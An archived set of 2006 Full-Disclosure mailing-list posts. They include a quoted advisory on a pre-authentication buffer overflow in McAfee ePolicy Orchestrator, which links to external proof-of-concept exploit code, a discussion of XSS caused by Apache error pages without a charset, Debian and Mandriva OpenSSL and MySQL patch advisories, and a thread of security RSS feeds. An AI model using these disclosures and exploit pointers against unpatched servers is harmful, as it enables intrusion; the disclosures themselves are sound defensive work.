http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061002/632e8dfd/attachment.bin From debasis.mohanty.listmails at gmail.com Tue Oct 3 07:24:01 2006 From: debasis.mohanty.listmails at gmail.com (Debasis Mohanty) Date: Mon, 2 Oct 2006 23:24:01 -0700 Subject: [Full-disclosure] McAfee EPO Buffer Overflow In-Reply-To: <000f01c6e5c5$dbd20510$2100a8c0@kamau> Message-ID: <4521520e.736207fa.08af.35fc@mx.gmail.com> An xtreamly neat work muts !! :) -d -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of muts Sent: Sunday, October 01, 2006 6:56 PM To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] McAfee EPO Buffer Overflow ################################################################### # # # McAfee Epolicy 3.5.0 / Protection Pilot 1.1.0 Buffer Overflow # # # # www.remote-exploit.org # # # # muts {at} remote-exploit org # ################################################################### [-] Product Information McAfeeR ePolicy OrchestratorR is a security management solution that gives you a coordinated defense against malicious threats and attacks. As your central hub, you can keep protection up to date; configure and enforce protection policies; and monitor security status from one centralized console. [-] Vulnerability Description McAfeeR ePolicy OrchestratorR contains a pre-authentication buffer overflow vulnerability in NAISERV.exe. Protection Pilot 1.1.0 uses the same HTTP server, and is also vulnerable. [-] Exploit Proof of concept exploit code is available at http://www.remote-exploit.org/exploits/mcafee_epolicy_source.pm [-] Exploitation Details http://www.remote-exploit.org/advisories/mcafee-epo.pdf [-] Vendor Status Vendor was notified July 14th, 2006. ehm. [-] Credits The vulnerability was discovered by Mati Aharoni (muts) and xbxice. [-] Shameless Promotion Get ready for BackTrack v.2.0! _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From eaton.lists at gmail.com Mon Oct 2 19:27:13 2006 From: eaton.lists at gmail.com (Brian Eaton) Date: Mon, 2 Oct 2006 14:27:13 -0400 Subject: [Full-disclosure] IE UXSS (Universal XSS in IE, was Re: Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053]) In-Reply-To: References: <200610021236.k92CaKZO014965@asti.maths.usyd.edu.au> <242a0a8f0610020644x37f26acate234bf012073e457@mail.gmail.com> Message-ID: <242a0a8f0610021127l634151b3v1e762eccdb41526f@mail.gmail.com> On 10/2/06, Paul Schmehl wrote: > --On October 2, 2006 9:44:27 AM -0400 Brian Eaton > wrote: > > > > I'm guessing that you tested a server wth some kind of customized 404 > > response that neglected to include a charset specification. That's > > not a vulnerability in Apache, that is poor site configuration. > > > Brian, a question for clarification. When you say "customized 404 > response", you are not referring to a customized error document (as > described briefly in the httpd.conf file) but rather to having changed the > headers that the server returns when queried with a GET request, correct? > And wouldn't this require changing source code and compiling a custom > build of apache? I am referring to the customized error documents described in the httpd.conf file. No recompiling required. The default Apache response for 404s includes a content-type header specifying the iso-8859-1 charset. If you set up an ErrorDocument handler, though, Apache assumes you know what you are doing and does not include a charset specification in the content-type header. You need to do it yourself. Including a meta http-equiv tag in the HTML seems like an obvious fix, but there are other ways as well. Regards, Brian From noahm at debian.org Mon Oct 2 20:33:19 2006 From: noahm at debian.org (Noah Meyerhans) Date: Mon, 2 Oct 2006 21:33:19 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1185-2] New openssl packages fix arbitrary code execution Message-ID: <20061002193319.GA3496@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1185-2 security at debian.org http://www.debian.org/security/ Noah Meyerhans October 2nd, 2006 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : openssl Vulnerability : denial of service Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-2940 The fix used to correct CVE-2006-2940 introduced code that could lead to the use of uninitialized memory. Such use is likely to cause the application using the openssl library to crash, and has the potential to allow an attacker to cause the execution of arbitrary code. For the stable distribution (sarge) these problems have been fixed in version 0.9.7e-3sarge4. For the unstable and testing distributions (sid and etch, respectively), these problems will be fixed in version 0.9.7k-3 of the openssl097 compatibility libraries, and version 0.9.8c-3 of the openssl package. We recommend that you upgrade your openssl package. Note that services linking against the openssl shared libraries will need to be restarted. Common examples of such services include most Mail Transport Agents, SSH servers, and web servers. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4.dsc Size/MD5 checksum: 639 179f34093d860afff66964b5f1c99ee3 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4.diff.gz Size/MD5 checksum: 29707 0b4d462730327aba5a751bd4bec71c10 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e.orig.tar.gz Size/MD5 checksum: 3043231 a8777164bca38d84e5eb2b1535223474 Alpha architecture: http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_alpha.deb Size/MD5 checksum: 3341886 f0d0ef51fac89227b0d0705116439f5c http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_alpha.deb Size/MD5 checksum: 2448092 8065c52c7649f36221f8a48adfb4cb29 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_alpha.deb Size/MD5 checksum: 930234 5953c4c4a45352d41c3c414eda63ff00 AMD64 architecture: http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_amd64.deb Size/MD5 checksum: 2693980 cbd25bbed17ec73561337bfc3d8ed2ed http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_amd64.deb Size/MD5 checksum: 769904 2671cdf2f48013617ea509daac2bb4dc http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_amd64.deb Size/MD5 checksum: 903782 e370684d7c84d1eebcb69cdda35c6c6c ARM architecture: http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_arm.deb Size/MD5 checksum: 2556330 75c1a253ddad0b7ad87053552770e5c4 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_arm.deb Size/MD5 checksum: 690202 ccd435ca2c183940152f3bd70d84ee0b http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_arm.deb Size/MD5 checksum: 894144 2e5caaa90184d9ee9e607d18728e6f93 HP Precision architecture: http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_hppa.deb Size/MD5 checksum: 2695990 58fe1a247ef47faa559eef610b437db6 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_hppa.deb Size/MD5 checksum: 791382 f0c64d06307af937218944d6d8db6e2f http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_hppa.deb Size/MD5 checksum: 914576 631c681a3c4ce355962a7c684767a155 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_i386.deb Size/MD5 checksum: 2554956 c4c9aa14e74dbd6dac2cadd7cf48b522 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_i386.deb Size/MD5 checksum: 2265180 9047b6c6036c048ad75fa397f220ae39 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_i386.deb Size/MD5 checksum: 906268 070d1d1680f90da5509121c44de7a254 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_ia64.deb Size/MD5 checksum: 3396206 3a3d88238a48d33b39e7575a97c6cfdf http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_ia64.deb Size/MD5 checksum: 1038432 e2e4e1d388c5d45c8d30e16d661ad24c http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_ia64.deb Size/MD5 checksum: 975152 1783b49f3b7a12bd18dff0fcc37f5d68 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_m68k.deb Size/MD5 checksum: 2317348 b4930b1cf5e642bf509d44dd83de193f http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_m68k.deb Size/MD5 checksum: 661716 d5fb4eb5947c8765e268696e94a46a8b http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_m68k.deb Size/MD5 checksum: 889932 e1ecef3780edd38743246dfda1424e8c Big endian MIPS architecture: http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_mips.deb Size/MD5 checksum: 2779464 591dbe4f6d73d56c9e9ff72f2d0a5385 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_mips.deb Size/MD5 checksum: 706682 0b3de7eef13969d065ed057fda34afc2 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_mips.deb Size/MD5 checksum: 896834 e2b8f38056a06f63c3ce6c10d9d95dba Little endian MIPS architecture: http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_mipsel.deb Size/MD5 checksum: 2767364 883d0167f6642e90e8a183b4f87a78ba http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_mipsel.deb Size/MD5 checksum: 694532 f4961231ef2c2b8ff46f173338a7fa36 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_mipsel.deb Size/MD5 checksum: 895922 2ad35f3927ba71d8054fe8cd4316f5b0 PowerPC architecture: http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_powerpc.deb Size/MD5 checksum: 2775608 0dca0ec9cf2d230ce68394849be748b1 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_powerpc.deb Size/MD5 checksum: 779456 6736cdc1dfe5f19013f4dee0a2b3b1cf http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_powerpc.deb Size/MD5 checksum: 908418 8759696eff63836597e4247c06ba7b22 IBM S/390 architecture: http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_s390.deb Size/MD5 checksum: 2717788 12fb63ace68a2698c19c725530ab18d9 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_s390.deb Size/MD5 checksum: 814012 adcee88124369de1daeae0545e0517a0 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_s390.deb Size/MD5 checksum: 918524 b93704f4ce84489d4ee163098a783962 Sun Sparc architecture: http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.7e-3sarge4_sparc.deb Size/MD5 checksum: 2630606 a20a47b2f291810a09fd04a4c130ddb0 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.7_0.9.7e-3sarge4_sparc.deb Size/MD5 checksum: 1886152 8521da994bf2a6df3bdc457fb3e0683b http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.7e-3sarge4_sparc.deb Size/MD5 checksum: 924556 ff8cee5f5a9653a9dd917b4ec51166ee These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFFIWjaXm3vHE4uyloRAlCnAKDJS/TqmvEdkWKPzE3d5MmsC+VAXgCg3Kw+ 43qPyLtg10UxpWWh0fHpOnA= =Xbwi -----END PGP SIGNATURE----- From security at mandriva.com Mon Oct 2 21:52:00 2006 From: security at mandriva.com (security at mandriva.com) Date: Mon, 2 Oct 2006 14:52:00 -0600 Subject: [Full-disclosure] [ MDKSA-2006:172-1 ] - Updated openssl packages fix vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2006:172-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : openssl Date : October 2, 2006 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 _______________________________________________________________________ Problem Description: Dr S N Henson of the OpenSSL core team and Open Network Security recently developed an ASN1 test suite for NISCC (www.niscc.gov.uk). When the test suite was run against OpenSSL two denial of service vulnerabilities were discovered. During the parsing of certain invalid ASN1 structures an error condition is mishandled. This can result in an infinite loop which consumes system memory. (CVE-2006-2937) Certain types of public key can take disproportionate amounts of time to process. This could be used by an attacker in a denial of service attack. (CVE-2006-2940) Tavis Ormandy and Will Drewry of the Google Security Team discovered a buffer overflow in the SSL_get_shared_ciphers utility function, used by some applications such as exim and mysql. An attacker could send a list of ciphers that would overrun a buffer. (CVE-2006-3738) Tavis Ormandy and Will Drewry of the Google Security Team discovered a possible DoS in the sslv2 client code. Where a client application uses OpenSSL to make a SSLv2 connection to a malicious server that server could cause the client to crash. (CVE-2006-4343) Updated packages are patched to address these issues. Update: There was an error in the original published patches for CVE-2006-2940. New packages have corrected this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343 _______________________________________________________________________ Updated Packages: Mandriva Linux 2006.0: 5e48a8d9a6a03a045b6d0d2b6903dc5b 2006.0/i586/libopenssl0.9.7-0.9.7g-2.5.20060mdk.i586.rpm f86f3a2efd19ff5fb1600212cbd8e463 2006.0/i586/libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk.i586.rpm 73b99c1a8a34fe3c2279c09c4f385804 2006.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.i586.rpm 526fcd69e1a1768c82afd573dc16982f 2006.0/i586/openssl-0.9.7g-2.5.20060mdk.i586.rpm 441a806fc8a50f74f5b4bcfce1fc8f66 2006.0/SRPMS/openssl-0.9.7g-2.5.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 54ed69fc4976d3c0953eeebd3c10471a 2006.0/x86_64/lib64openssl0.9.7-0.9.7g-2.5.20060mdk.x86_64.rpm 632fbe5eaff684ec2f27da4bbe93c4f6 2006.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.5.20060mdk.x86_64.rpm 04dbe52bda3051101db73fabe687bd7e 2006.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.x86_64.rpm 5e48a8d9a6a03a045b6d0d2b6903dc5b 2006.0/x86_64/libopenssl0.9.7-0.9.7g-2.5.20060mdk.i586.rpm f86f3a2efd19ff5fb1600212cbd8e463 2006.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk.i586.rpm 73b99c1a8a34fe3c2279c09c4f385804 2006.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.i586.rpm ca169246cc85db55839b265b90e8c842 2006.0/x86_64/openssl-0.9.7g-2.5.20060mdk.x86_64.rpm 441a806fc8a50f74f5b4bcfce1fc8f66 2006.0/SRPMS/openssl-0.9.7g-2.5.20060mdk.src.rpm Mandriva Linux 2007.0: db68f8f239604fb76a0a10c70104ef61 2007.0/i586/libopenssl0.9.8-0.9.8b-2.2mdv2007.0.i586.rpm 26a4de823aee08e40d28ed7e6ff5b2ff 2007.0/i586/libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0.i586.rpm ab949cf85296ceae864f83fbbac2b55a 2007.0/i586/libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.i586.rpm a97c6033a33fabcd5509568304b7a988 2007.0/i586/openssl-0.9.8b-2.2mdv2007.0.i586.rpm 78964615b7bd71028671257640be3bc5 2007.0/SRPMS/openssl-0.9.8b-2.2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 1895971ef1221056075c4ee3d4aaac72 2007.0/x86_64/lib64openssl0.9.8-0.9.8b-2.2mdv2007.0.x86_64.rpm cfd59201e5e9c436f42b969b4aa567f1 2007.0/x86_64/lib64openssl0.9.8-devel-0.9.8b-2.2mdv2007.0.x86_64.rpm 36da85c76eddf95feeb3f4b792528483 2007.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.x86_64.rpm db68f8f239604fb76a0a10c70104ef61 2007.0/x86_64/libopenssl0.9.8-0.9.8b-2.2mdv2007.0.i586.rpm 26a4de823aee08e40d28ed7e6ff5b2ff 2007.0/x86_64/libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0.i586.rpm ab949cf85296ceae864f83fbbac2b55a 2007.0/x86_64/libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.i586.rpm e3aebeae455a0820c5f28483bd6d3fa5 2007.0/x86_64/openssl-0.9.8b-2.2mdv2007.0.x86_64.rpm 78964615b7bd71028671257640be3bc5 2007.0/SRPMS/openssl-0.9.8b-2.2mdv2007.0.src.rpm Corporate 3.0: 7f60837e42b45ce50f365ec1372d6aeb corporate/3.0/i586/libopenssl0.9.7-0.9.7c-3.7.C30mdk.i586.rpm 1e7834f6f0fe000f8f00ff49ee6f7ea0 corporate/3.0/i586/libopenssl0.9.7-devel-0.9.7c-3.7.C30mdk.i586.rpm 6c86220445ef34c2dadadc3e00701885 corporate/3.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.7.C30mdk.i586.rpm c25c4042a91b6e7bf9aae1aa2fea32a5 corporate/3.0/i586/openssl-0.9.7c-3.7.C30mdk.i586.rpm 2c47b1604aa89033799b1ead4bcebe01 corporate/3.0/SRPMS/openssl-0.9.7c-3.7.C30mdk.src.rpm Corporate 3.0/X86_64: 52dfd4d10e00c9bd0944e4486190de93 corporate/3.0/x86_64/lib64openssl0.9.7-0.9.7c-3.7.C30mdk.x86_64.rpm 258a19afc44dadfaa00d0ebd8b3c0df4 corporate/3.0/x86_64/lib64openssl0.9.7-devel-0.9.7c-3.7.C30mdk.x86_64.rpm cd5cc151e476552be549c6a37b8a71ea corporate/3.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7c-3.7.C30mdk.x86_64.rpm 7f60837e42b45ce50f365ec1372d6aeb corporate/3.0/x86_64/libopenssl0.9.7-0.9.7c-3.7.C30mdk.i586.rpm 492fcc0df9172557a3297d0082321d4d corporate/3.0/x86_64/openssl-0.9.7c-3.7.C30mdk.x86_64.rpm 2c47b1604aa89033799b1ead4bcebe01 corporate/3.0/SRPMS/openssl-0.9.7c-3.7.C30mdk.src.rpm Corporate 4.0: 76b3078e53be2ddc019bee74ccb1f39e corporate/4.0/i586/libopenssl0.9.7-0.9.7g-2.5.20060mlcs4.i586.rpm 0aa4ca3b0d2925255650fb90132d7aad corporate/4.0/i586/libopenssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.i586.rpm 86dc91f1701293f3319a833746bbe421 corporate/4.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.i586.rpm daa6c3473f59405778dedd02de73fcc9 corporate/4.0/i586/openssl-0.9.7g-2.5.20060mlcs4.i586.rpm a8d2a946d266a94c6d46537ad78b18fa corporate/4.0/SRPMS/openssl-0.9.7g-2.5.20060mlcs4.src.rpm Corporate 4.0/X86_64: b5ae71aacd5b99be9e9327d58da29230 corporate/4.0/x86_64/lib64openssl0.9.7-0.9.7g-2.5.20060mlcs4.x86_64.rpm 89296e03778a198940c1c413e44b9f45 corporate/4.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.x86_64.rpm cb17a0d801c1181ab380472b8ffb085e corporate/4.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.x86_64.rpm 76b3078e53be2ddc019bee74ccb1f39e corporate/4.0/x86_64/libopenssl0.9.7-0.9.7g-2.5.20060mlcs4.i586.rpm 0aa4ca3b0d2925255650fb90132d7aad corporate/4.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.i586.rpm 86dc91f1701293f3319a833746bbe421 corporate/4.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.i586.rpm 8d9a55afdc6d930916bac00fd4c4739b corporate/4.0/x86_64/openssl-0.9.7g-2.5.20060mlcs4.x86_64.rpm a8d2a946d266a94c6d46537ad78b18fa corporate/4.0/SRPMS/openssl-0.9.7g-2.5.20060mlcs4.src.rpm Multi Network Firewall 2.0: cd7ad7e95ce17995dfa8129ebe517049 mnf/2.0/i586/libopenssl0.9.7-0.9.7c-3.7.M20mdk.i586.rpm 11771240baebdc6687af70a8a0f2ffd2 mnf/2.0/i586/libopenssl0.9.7-devel-0.9.7c-3.7.M20mdk.i586.rpm 8f672bc81b9528598a8560d876612bfa mnf/2.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.7.M20mdk.i586.rpm 214f857a36e5c3e600671b7291cd08ae mnf/2.0/i586/openssl-0.9.7c-3.7.M20mdk.i586.rpm bbb299fd643ccbfbdc1a48b12c7005ce mnf/2.0/SRPMS/openssl-0.9.7c-3.7.M20mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFIU7bmqjQ0CJFipgRAuYAAKCZlwMqJzrVCpKYdEqs+UiyM6WrSQCfeIv3 mAaLoEPfjUca1TR98vgpZUU= =Ff9O -----END PGP SIGNATURE----- From security at mandriva.com Mon Oct 2 22:23:00 2006 From: security at mandriva.com (security at mandriva.com) Date: Mon, 2 Oct 2006 15:23:00 -0600 Subject: [Full-disclosure] [ MDKSA-2006:177 ] - Updated MySQL packages rebuilt against updated openssl. Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2006:177 http://www.mandriva.com/security/ _______________________________________________________________________ Package : MySQL Date : October 2, 2006 Affected: 2006.0, Corporate 3.0, Multi Network Firewall 2.0 _______________________________________________________________________ Problem Description: Openssl recently had several vulnerabilities which were patched (CVE-2006-2937,2940,3738,4339, 4343). Some MySQL versions are built against a static copy of the SSL libraries. As a precaution an updated copy built against the new libraries in being made available. _______________________________________________________________________ Updated Packages: Mandriva Linux 2006.0: 418e35dd59274a82fbbd30ad86ae4b52 2006.0/i586/libmysql14-4.1.12-4.10.20060mdk.i586.rpm c5f9cb360efec94d2697ed851ee176a2 2006.0/i586/libmysql14-devel-4.1.12-4.10.20060mdk.i586.rpm 910de5c23772bb3f26cdcdce8003d114 2006.0/i586/MySQL-4.1.12-4.10.20060mdk.i586.rpm abe1945164f6a636299eb1ae4bba1c78 2006.0/i586/MySQL-bench-4.1.12-4.10.20060mdk.i586.rpm 28b3e7d8c05df9b754f4cf945f30d428 2006.0/i586/MySQL-client-4.1.12-4.10.20060mdk.i586.rpm 675e9b54a946384c41f75fddbf1ae01f 2006.0/i586/MySQL-common-4.1.12-4.10.20060mdk.i586.rpm 1d4f0ae66414ce37aebfd3f4c1a83899 2006.0/i586/MySQL-Max-4.1.12-4.10.20060mdk.i586.rpm 22bda4fffb5fd0a4947e7b6504490221 2006.0/i586/MySQL-NDB-4.1.12-4.10.20060mdk.i586.rpm 65f2714658fbaa7194aa6a9e35bea114 2006.0/SRPMS/MySQL-4.1.12-4.10.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 6e7f0056a120f698eec53cb07638b4c7 2006.0/x86_64/lib64mysql14-4.1.12-4.10.20060mdk.x86_64.rpm b1ea5845d8148276d1a5d3c86a7812c7 2006.0/x86_64/lib64mysql14-devel-4.1.12-4.10.20060mdk.x86_64.rpm be05d787582cdffc9b501afec29d0d4a 2006.0/x86_64/MySQL-4.1.12-4.10.20060mdk.x86_64.rpm afef58f5bdbbc31174b7e4a38e6d3bea 2006.0/x86_64/MySQL-bench-4.1.12-4.10.20060mdk.x86_64.rpm 7df7c9d58ca919d0c2bfd8ec54df9f64 2006.0/x86_64/MySQL-client-4.1.12-4.10.20060mdk.x86_64.rpm 6f2adf900838a2daffc58c367356b5b9 2006.0/x86_64/MySQL-common-4.1.12-4.10.20060mdk.x86_64.rpm 4ae3e7c5ee1d2e808685fcf5ea1abbf6 2006.0/x86_64/MySQL-Max-4.1.12-4.10.20060mdk.x86_64.rpm adc04989620b1683064bceca1cc1f997 2006.0/x86_64/MySQL-NDB-4.1.12-4.10.20060mdk.x86_64.rpm 65f2714658fbaa7194aa6a9e35bea114 2006.0/SRPMS/MySQL-4.1.12-4.10.20060mdk.src.rpm Corporate 3.0: 323307ba6f7102132a1cb8443a75e66c corporate/3.0/i586/libmysql12-4.0.18-1.11.C30mdk.i586.rpm 49c8f4902afaceb40a5d02484b8698b0 corporate/3.0/i586/libmysql12-devel-4.0.18-1.11.C30mdk.i586.rpm b0610cd3eef31b8264c9d87f214ae974 corporate/3.0/i586/MySQL-4.0.18-1.11.C30mdk.i586.rpm 99122a2f538b7705392589376204ccb8 corporate/3.0/i586/MySQL-bench-4.0.18-1.11.C30mdk.i586.rpm ebfc7f7d062943f19fdc21e7b4a7c2d6 corporate/3.0/i586/MySQL-client-4.0.18-1.11.C30mdk.i586.rpm 7a57faae42e4291c023440d71c334694 corporate/3.0/i586/MySQL-common-4.0.18-1.11.C30mdk.i586.rpm 5b72f88050ce6ff4baf59050d4f1e105 corporate/3.0/i586/MySQL-Max-4.0.18-1.11.C30mdk.i586.rpm bace43f39e7de6cca61705269164ff26 corporate/3.0/SRPMS/MySQL-4.0.18-1.11.C30mdk.src.rpm Corporate 3.0/X86_64: 9b4551d3c2cbbd83f2d648281e281fb7 corporate/3.0/x86_64/lib64mysql12-4.0.18-1.11.C30mdk.x86_64.rpm 4bb8482468f2c5d8f949d3b70c18bec5 corporate/3.0/x86_64/lib64mysql12-devel-4.0.18-1.11.C30mdk.x86_64.rpm e840471dd81001b0bcf6eecb5fe15b7b corporate/3.0/x86_64/MySQL-4.0.18-1.11.C30mdk.x86_64.rpm 9de8c944a34e0a1245f076c59e8a116e corporate/3.0/x86_64/MySQL-bench-4.0.18-1.11.C30mdk.x86_64.rpm 2ad4b05e6082164ca3aaa0444b2a1560 corporate/3.0/x86_64/MySQL-client-4.0.18-1.11.C30mdk.x86_64.rpm a9a07403bf8c415d72ab28fd224cec31 corporate/3.0/x86_64/MySQL-common-4.0.18-1.11.C30mdk.x86_64.rpm bd267d5fe073af1ce9b36e18713f18db corporate/3.0/x86_64/MySQL-Max-4.0.18-1.11.C30mdk.x86_64.rpm bace43f39e7de6cca61705269164ff26 corporate/3.0/SRPMS/MySQL-4.0.18-1.11.C30mdk.src.rpm Multi Network Firewall 2.0: 6bfd646483d072e2b53f9eee29279f93 mnf/2.0/i586/libmysql12-4.0.18-1.11.M20mdk.i586.rpm dfaed993c2887c8ff6bae73d28bd8448 mnf/2.0/SRPMS/MySQL-4.0.18-1.11.M20mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFIVY7mqjQ0CJFipgRAh89AJ9kSEYZa/900BQik4CEWvDjK8wzPgCdGRdf JTyrM6cd5hvmXfC9oM9nA6M= =awYP -----END PGP SIGNATURE----- From gareth.davies at mynetsec.com Mon Oct 2 22:00:53 2006 From: gareth.davies at mynetsec.com (Gareth Davies) Date: Tue, 03 Oct 2006 05:00:53 +0800 Subject: [Full-disclosure] Security Rss Feeds In-Reply-To: <41011d980609300951r29d9058cga20091fb302fec47@mail.gmail.com> References: <41011d980609300951r29d9058cga20091fb302fec47@mail.gmail.com> Message-ID: <45217E05.5010008@mynetsec.com> crazy frog crazy frog wrote: > Hi, > > Please share various security related rss feeds you read daily. > > Thanks, > -CF > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > http://feeds.feedburner.com/darknethackers is pretty useful too and hasn't been mentioned yet. I also subscribe to some general ones like Register Security feed, digg/security, cnet security. Cheers. -- Gareth Davies - ISO 27001 LA, OPST Manager - Security Practice Network Security Solutions MSC Sdn. Bhd. Suite E-07-21, Block E, Plaza Mont' Kiara, No. 2 Jalan Kiara, Mont? Kiara, 50480 Kuala Lumpur, Malaysia Phone: +603-6203 5303 